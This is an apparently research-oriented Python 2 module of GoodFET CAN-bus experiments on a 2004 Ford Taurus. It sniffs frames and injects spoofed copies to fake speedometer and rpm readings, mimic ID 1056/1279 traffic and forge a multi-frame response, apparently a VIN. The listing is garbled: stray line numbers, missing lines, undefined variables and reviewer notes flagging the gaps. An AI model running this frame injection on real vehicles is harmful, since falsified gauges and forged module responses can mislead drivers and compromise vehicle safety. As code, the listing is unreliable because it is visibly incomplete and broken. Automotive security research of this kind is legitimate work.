4 import csv, time, argparse;
7 from random import randrange
8 from GoodFETMCPCAN import GoodFETMCPCAN;
9 from experiments import experiments
10 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
11 from intelhex import IntelHex;
16 class FordExperiments(experiments):
18 This class is a subclass of experiments and is a car specific module for
19 demonstrating and testing hacks.
def __init__(self, dataLocation = "../../contrib/ThayerData/"):
    """
    Set up the experiment object by running GoodFETMCPCANCommunication's
    initializer on this instance.

    @param dataLocation: passed through unchanged to
                         GoodFETMCPCANCommunication.__init__.
    """
    # NOTE(review): the class statement lists `experiments` as the base class,
    # yet the initializer called here belongs to GoodFETMCPCANCommunication --
    # confirm that `experiments` derives from it.
    GoodFETMCPCANCommunication.__init__(self, dataLocation)
    #super(FordExperiments,self).__init__(self) #initialize chip
def mimic1056(self,packetData,runTime):
    """
    Sniff one frame with standard ID 1056, then retransmit a copy of it until
    runTime seconds have passed since the frame was received.

    @param packetData: mapping queried with .get(idx); where it returns None
                       the corresponding sniffed byte is used instead.
    @param runTime: transmit duration in seconds, measured from the moment the
                    reference frame was read.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.spitSetup(self.freq)
    #FIGURE out how to clear buffers
    # The same ID is given six times; presumably this restricts reception to
    # ID 1056 -- confirm against addFilter.
    self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
    packet1 = self.client.rxpacket();
    # NOTE(review): packet1 is parsed before the None test in the loop below;
    # confirm packet2parsed tolerates None.
    packetParsed = self.client.packet2parsed(packet1);
    #keep sniffing till we read a packet
    while( packet1 == None or packetParsed.get('sID') != 1056 ):
        packet1 = self.client.rxpacket()
        packetParsed = self.client.packet2parsed(packet1)
    # Reference time for both the run duration and the counter computed below.
    recieveTime = time.time()
    packetParsed = self.client.packet2parsed(packet1)
    if( packetParsed['sID'] != 1056):
        print "Sniffed wrong packet"
    countInitial = ord(packetParsed['db3']) #initial count value
    #set data packet to match what was sniffed or at least what was input
    # NOTE(review): `packet` and `idx` are not assigned anywhere in the lines
    # shown; the statements that create the list and iterate over the data
    # byte keys are missing from the listing.
    if(packetData.get(idx) == None):
        packet.append(ord(packetParsed.get(idx)))
    # NOTE(review): reads as the alternative branch of the test above; no
    # `else:` line appears in the listing.
    packet.append(packetData.get(idx))
    #### split SID into different regs
    SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # Five header bytes followed by the eight data bytes collected above.
    packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
              0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
              packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
    self.client.txpacket(packet);
    # NOTE(review): tpast is read inside the loop before any assignment shown
    # here, and `math` is not among the imports visible at the top of the file.
    while( (time.time()-recieveTime) < runTime):
        #care about db3 or packet[8] that we want to count at the rate that it is
        dT = time.time()-tpast
        # One count per 0.2 s elapsed since the sniffed frame, starting from
        # the sniffed db3 value; the modulo keeps the result in 0..254.
        # NOTE(review): the line that stores db3 into the outgoing frame is
        # not in the listing.
        db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
        self.client.txpacket(packet)
        # NOTE(review): lines are missing before this call, so whether it runs
        # on every pass or only on an alternative branch cannot be told here.
        self.client.MCPrts(TXB0=True)
        tpast = time.time() #update our transmit time on the one before
def cycledb1_1056(self,runTime):
    """
    Sniff one frame with standard ID 1056 and retransmit a copy of it, with
    data byte db1 overwritten, until runTime seconds have passed since the
    frame was received.

    @param runTime: transmit duration in seconds, measured from the moment the
                    reference frame was read.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    #FIGURE out how to clear buffers
    self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
    packet1 = self.client.rxpacket();
    # NOTE(review): packet1 is parsed before the None test in the loop below;
    # confirm packet2parsed tolerates None.
    packetParsed = self.client.packet2parsed(packet1);
    #keep sniffing till we read a packet
    while( packet1 == None or packetParsed.get('sID') != 1056 ):
        packet1 = self.client.rxpacket()
        packetParsed = self.client.packet2parsed(packet1)
    recieveTime = time.time()
    packetParsed = self.client.packet2parsed(packet1)
    if( packetParsed['sID'] != 1056):
        print "Sniffed wrong packet"
    #set data packet to match what was sniffed or at least what was input
    # NOTE(review): `packet`, `idx` and `packetValue` are not assigned in the
    # lines shown; the statements that set them are missing from the listing.
    packet.append(ord(packetParsed.get(idx)))
    # Index 1 of the data list is the byte that ends up as db1 in the frame.
    packet[1] = packetValue;
    #### split SID into different regs
    SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # Five header bytes followed by the eight data bytes collected above.
    packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
              0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
              # lower nibble is DLC
              packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
    self.client.txpacket(packet);
    # NOTE(review): tpast is read inside the loop before any assignment shown
    # here.
    while( (time.time()-recieveTime) < runTime):
        #care about db3 or packet[8] that we want to count at the rate that it is
        dT = time.time()-tpast
        # NOTE(review): the statements that change the cycled byte between
        # transmissions are missing from the listing; only two disabled
        # fragments survive.
        #temp = ((packetValue+1))%2
        # pV = packetValue%255
        self.client.txpacket(packet)
        tpast = time.time() #update our transmit time on the one before
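def getBackground(self,sId):
    """
    Block until a frame with the given standard ID is received and return it
    in parsed form.

    The callers in this class index the result by data byte name, so the
    parsed frame has to be handed back.  Empty reads are skipped before
    parsing, which keeps None away from packet2parsed.

    @param sId: standard CAN ID to wait for.
    @return: the value packet2parsed produced for the first matching frame.
    """
    while True:
        packet1 = self.client.rxpacket()
        if packet1 is None:
            # nothing received on this poll; keep sniffing
            continue
        packetParsed = self.client.packet2parsed(packet1)
        if packetParsed.get('sID') == sId:
            return packetParsed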
def cycle4packets1279(self):
    """
    Read one frame with standard ID 1279 and transmit it again, first setting
    db7 to 83 when db0 equals 16.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.client.serInit()
    self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
    packetParsed = self.getBackground(1279)
    # NOTE(review): db0 and db7 are bare names here, not the string keys
    # ('db3') used elsewhere in this class, and no assignment to them is shown.
    if (packetParsed[db0] == 16):
        # if it's the first of the four packets, replace the value in db7 with 83
        packetParsed[db7] = 83
        # transmit new packet
        # NOTE(review): txpacket receives the parsed frame here, whereas the
        # other methods hand it a flat list of header and data bytes.
        self.client.txpacket(packetParsed)
    # NOTE(review): the comments below describe an alternative branch; no
    # `else:` line appears in the listing.
    # otherwise, leave it alone
    # transmit same packet we read in
    self.client.txpacket(packetParsed)
    # print the packet we are transmitting
def oscillateTemperature(self,time):
    """
    Retransmit a sniffed ID-1056 frame while computing a sine-shaped value
    (centre 130, amplitude 30, period 20 seconds) from the elapsed time.

    @param time: not read in the lines shown; inside this method the name
                 hides the module-level `time`.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.client.serInit()
    #FIGURE out how to clear buffers
    self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
    packetParsed = self.getBackground(1056)
    #set data packet to match what was sniffed or at least what was input
    # NOTE(review): `packet`, `idx` and `packetValue` are not assigned in the
    # lines shown.
    packet.append(ord(packetParsed.get(idx)))
    packet[1] = packetValue;
    #### split SID into different regs
    SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # Five header bytes followed by the eight data bytes collected above.
    packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
              0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
              # lower nibble is DLC
              packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
    self.client.txpacket(packet);
    # NOTE(review): `tT`, `math` and `runTime` are used below but are neither
    # parameters nor among the imports visible at the top of the file.
    startTime = tT.time()
    while( (tT.time()-startTime) < runTime):
        dt = tT.time()-startTime
        # Phase advances by 2*pi every 20 seconds of elapsed time.
        inputValue = ((2.0*math.pi)/20.0)*dt
        # Ranges over 100..160 as the sine swings between -1 and 1.
        value = 30*math.sin(inputValue)+130
        # NOTE(review): the statement that writes `value` into the frame is
        # not in the listing; only this disabled assignment survives.
        #packet[5] = int(value)
        self.client.txpacket(packet)
        #tpast = time.time() #update our transmit time on the one before
# NOTE(review): the `def` line of the method these statements belong to is
# not in the listing, and neither are the assignments to listenID and
# responseID that they rely on.
# Purpose of the run: build three fixed 8-byte frames, then watch the bus for
# `duration` seconds and trigger transmission when a frame from listenID
# carries the expected byte.
#reset everything on the chip
self.client.serInit()
duration = 20; #seconds
# Bytes of the request to react to; elements 0, 1 and 3 are read below.
listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
#actual response by the car
#r1 = [34, 88, 0, 0, 0, 0, 0, 0]
#r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
#r3 = [16, 19, 73, 4, 1, 70, 65, 66]
# Same as the recorded response above except for bytes 3 and 4 of r3.
r1 = [34, 88, 0, 0, 0, 0, 0, 0]
r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
r3 = [16, 19, 73, 160, 159, 70, 65, 66]
SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
           0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
           # lower nibble is DLC
           r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
           0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
           # lower nibble is DLC
           r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
           0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
           # lower nibble is DLC
           r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
# NOTE(review): the bare data lists r1..r3 are passed here; packet1..packet3,
# which carry the ID header bytes, are built above but not used in the lines
# shown.
self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
#filter for the correct packet
self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
self.client.rxpacket()
self.client.rxpacket() # flush buffers if there is anything
startTime = tT.time()
while( (tT.time() -startTime) < duration):
    packet = self.client.rxpacket()
    # NOTE(review): a line is missing from the listing here; as shown, a None
    # result from rxpacket would reach the indexing below.
    # Rebuild the 11-bit ID from the two header bytes, the reverse of the
    # SIDhigh/SIDlow split above.
    sid = ord(packet[0])<<3 | ord(packet[1])>>5
    if( sid == listenID):
        # NOTE(review): with five header bytes ahead of the data, index 6 is
        # the second data byte, yet it is compared with element 3 of
        # listenPacket -- confirm which byte is meant.
        byte3 = ord(packet[6])
        if( byte3 == listenPacket[3]):
            print "SendingPackets!"
            # NOTE(review): spelled multpackSpit here and multiPacketSpit
            # above; confirm both names exist.
            self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
def mphToByteValue(self, mph):
    """
    Convert a speed in mph to the raw value carried in the speed byte.

    This is the inverse of the decoding used elsewhere in this class,
    mph = 1.617*value - 63.5.

    @param mph: speed in miles per hour.
    @return: the unrounded result as a float; it is not limited to 0..255,
             and the caller in this class truncates it with int().
    """
    shifted = mph + 63.5
    return shifted / 1.617
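def ByteValuToMph(self, value):
    """
    Convert the raw value of the speed byte to a speed in mph.

    @param value: numeric byte value (an int, not a one-character string).
    @return: 1.617*value - 63.5 as a float.
    """
    # Uses the argument itself: no `packet` exists in this scope, so reading
    # packet[9] here could only fail with a NameError.
    return 1.617 * value - 63.5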
def setMPH(self, mph):
    """
    Capture one frame with standard ID 513 and retransmit it for 10 seconds
    with the fifth data byte (db4) replaced by the encoding of mph.

    @param mph: speed to encode, in miles per hour; the encoded value is
                truncated with int() and is not range-checked here.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.client.serInit()
    self.addFilter([513, 513, 513])
    # Three reads whose results are discarded (presumably to drain stale
    # frames -- confirm).
    self.client.rxpacket()
    self.client.rxpacket()
    self.client.rxpacket()
    SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    startTime = time.time()
    #while((time.time() - startTime) < 10):
    # NOTE(review): `packet` is tested below before any assignment shown here.
    # catch a packet and check its db4 value
    while (packet == None):
        packet=self.client.rxpacket();
    #print self.client.packet2str(packet)
    #print "DB4 = %02d " %ord(packet[9])
    #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
    # calculate our new mph and db4 value
    newSpeed = self.mphToByteValue(mph)
    #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
    # Received bytes 5..12 are copied through as data bytes; only index 9 is
    # replaced by the new speed value.
    newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
                 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
                 # lower nibble is DLC
                 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
    # load new packet into TXB0 and check time
    self.multiPacketSpit(packet0=newPacket, packet0rts=True)
    starttime = time.time()
    # spit new value for 10 seconds
    while (time.time()-starttime < 10):
        self.multiPacketSpit(packet0rts=True)
def speedometerHack(self, inputs):
    """
    Capture one frame with standard ID 513, add inputs[0] to the speed decoded
    from its fifth data byte (db4) and retransmit the altered frame for one
    second.

    Classic CAN frames carry no sender authentication, so a receiver that
    accepts ID 513 cannot tell these frames from the original sender's.

    @param inputs: sequence whose first element is the mph offset to add.  The
                   command-line entry point passes args.variable, which
                   defaults to None, so a run without -v fails at inputs[0].
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.client.serInit()
    self.addFilter([513, 513, 513])
    SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # NOTE(review): `packet` is tested below before any assignment shown here;
    # the lines between the ID split and this loop are missing.
    # catch a packet and check its db4 value
    while (packet == None):
        packet=self.client.rxpacket();
    print self.client.packet2str(packet)
    print "DB4 = %02d " %ord(packet[9])
    # Linear decoding of the speed byte.
    mph = 1.617*ord(packet[9]) - 63.5
    print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
    # calculate our new mph and db4 value
    mph = mph + inputs[0];
    # Inverse of the decoding above; the result is not limited to 0..255.
    newSpeed = ( mph + 63.5 ) / 1.617
    print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
    # Received bytes 5..12 are copied through as data bytes; only index 9 is
    # replaced by the new speed value.
    newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
                 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
                 # lower nibble is DLC
                 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
    # load new packet into TXB0 and check time
    self.multiPacketSpit(packet0=newPacket, packet0rts=True)
    starttime = time.time()
    # spit new value for 1 second
    while (time.time()-starttime < 1):
        self.multiPacketSpit(packet0rts=True)
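def rpmToByteValue(self, rpm):
    """
    Convert an engine speed in rpm to the raw value carried in the rpm byte.

    This is the inverse of the decoding used elsewhere in this class,
    rpm = 64.5*value - 61.88.

    @param rpm: engine speed in revolutions per minute.
    @return: the unrounded result as a float; it is not limited to 0..255.
    """
    # The result has to be returned: setRPM feeds it straight into int().
    return (rpm + 61.88) / 64.5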
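def ValueTorpm(self, value):
    """
    Convert the raw value of the rpm byte to an engine speed in rpm.

    @param value: numeric byte value (an int, not a one-character string).
    @return: 64.5*value - 61.88 as a float.
    """
    # Hand the result back; computing it into a local alone yields None.
    return 64.5 * value - 61.88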
def setRPM(self, rpm):
    """
    For 10 seconds, capture frames with standard ID 513 and retransmit each
    one for a second with its first data byte replaced by the encoding of rpm.

    @param rpm: engine speed to encode, in revolutions per minute; the encoded
                value is truncated with int() and is not range-checked here.
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines; gaps are marked below and the nesting across them is inferred.
    self.client.serInit()
    self.addFilter([513, 513, 513,513])
    SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # Three reads whose results are discarded (presumably to drain stale
    # frames -- confirm).
    self.client.rxpacket()
    self.client.rxpacket()
    self.client.rxpacket()
    # NOTE(review): `tT` is not among the imports visible at the top of the
    # file; the inner timing below uses `time` directly.
    startTime = tT.time()
    while((tT.time() - startTime )< 10):
        # NOTE(review): `packet` is tested below before any assignment shown
        # here.
        # catch a packet and check its db4 value
        while (packet == None):
            packet=self.client.rxpacket();
        #print self.client.packet2str(packet)
        #print "DB4 = %02d " %ord(packet[5])
        #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
        newRPM = self.rpmToByteValue(rpm)
        #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
        # Received bytes 6..12 are copied through as data bytes; the first
        # data byte is replaced by the new rpm value.
        newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
                     0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
                     # lower nibble is DLC
                     int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
        # load new packet into TXB0 and check time
        self.multiPacketSpit(packet0=newPacket, packet0rts=True)
        starttime = time.time()
        # spit new value for 1 second
        while (time.time()-starttime < 1):
            self.multiPacketSpit(packet0rts=True)
def rpmHack(self, inputs):
    """
    This method will increase the rpm by the given rpm amount.

    For 10 seconds it captures frames with standard ID 513, adds inputs[0] to
    the rpm decoded from the first data byte and retransmits each altered
    frame for one second.

    @param inputs: Single element of a list that corresponds to the amount
                   added to the decoded rpm.  The command-line entry point
                   passes args.variable, which defaults to None, so a run
                   without -v fails at inputs[0].
    """
    # NOTE(review): the listing this method was taken from drops several
    # lines, including the docstring delimiters; gaps are marked below and the
    # nesting across them is inferred.
    self.client.serInit()
    self.addFilter([513, 513, 513])
    SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
    SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
    # NOTE(review): `tT` is not among the imports visible at the top of the
    # file; the inner timing below uses `time` directly.
    startTime = tT.time()
    while((tT.time() - startTime )< 10):
        # NOTE(review): `packet` is tested below before any assignment shown
        # here.
        # catch a packet and check its db4 value
        while (packet == None):
            packet=self.client.rxpacket();
        print self.client.packet2str(packet)
        # NOTE(review): the label printed says DB4, but index 5 is the first
        # data byte under the frame layout used for newPacket below.
        print "DB4 = %02d " %ord(packet[5])
        # Linear decoding of the rpm byte.
        rpm = 64.5*ord(packet[5]) - 61.88
        print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
        # calculate our new rpm and byte value
        rpm = rpm + inputs[0];
        # Inverse of the decoding above; the result is not limited to 0..255.
        newRPM = ( rpm + 61.88 ) / 64.5
        print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
        # Received bytes 6..12 are copied through as data bytes; the first
        # data byte is replaced by the new rpm value.
        newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
                     0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
                     # lower nibble is DLC
                     int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
        # load new packet into TXB0 and check time
        self.multiPacketSpit(packet0=newPacket, packet0rts=True)
        starttime = time.time()
        # spit new value for 1 second
        while (time.time()-starttime < 1):
            self.multiPacketSpit(packet0rts=True)
466 def runOdometer(self):
469 if __name__ == "__main__":
471 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
473 Run Hacks on a Ford taurus 2004:
479 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']);
480 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
483 args = parser.parse_args();
484 inputs = args.variable
485 fe = FordExperiments("../../contrib/ThayerData/");
487 if( args.verb == 'speedometerHack'):
488 fe.speedometerHack(inputs=inputs)
489 if( args.verb == 'rpmHack'):
490 fe.rpmHack(inputs=inputs)
491 elif( args.verb == 'fakeVIN'):